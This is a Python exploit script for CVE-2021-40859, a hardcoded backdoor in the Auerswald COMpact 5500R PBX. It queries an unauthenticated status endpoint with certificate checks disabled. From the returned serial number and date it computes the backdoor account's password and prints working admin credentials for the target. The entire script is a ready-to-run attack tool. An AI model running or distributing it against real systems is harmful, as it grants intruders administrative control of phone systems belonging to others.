CVE-2021-40859.py

# Exploit Title: Auerswald VoIP System Secret Backdoors
# Date: 29.12.2021
# Exploit Author: pussycat0x
# Vendor Homepage: https://www.auerswald.de/
# Version: COMpact 5500R PBX
# CVE : CVE-2021-40859
import requests,json, sys, hashlib
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# https://github.com/pussycat0x/CVE-2021-40859
# reference: https://thehackernews.com/2021/12/secret-backdoors-found-in-german-made.html
req =requests.get(sys.argv[1]+'/about_state', verify=False)
if req.status_code == 200:
    print('"about_state" Unauthenticated Endpoint Accessible')
else:
    sys.exit()    
data =req.text
def main():
    jdata =json.loads(data)
    serial=(jdata["serial"])
    date=(jdata["date"])
    reset=serial+'r2d2'+date
    hash =hashlib.md5(reset.encode('utf-8')).hexdigest()
    pwd = hash[0:7]
    print("Backdoor Account Username: Schandelah & Password: "+pwd+' Login URL '+sys.argv[1])
main()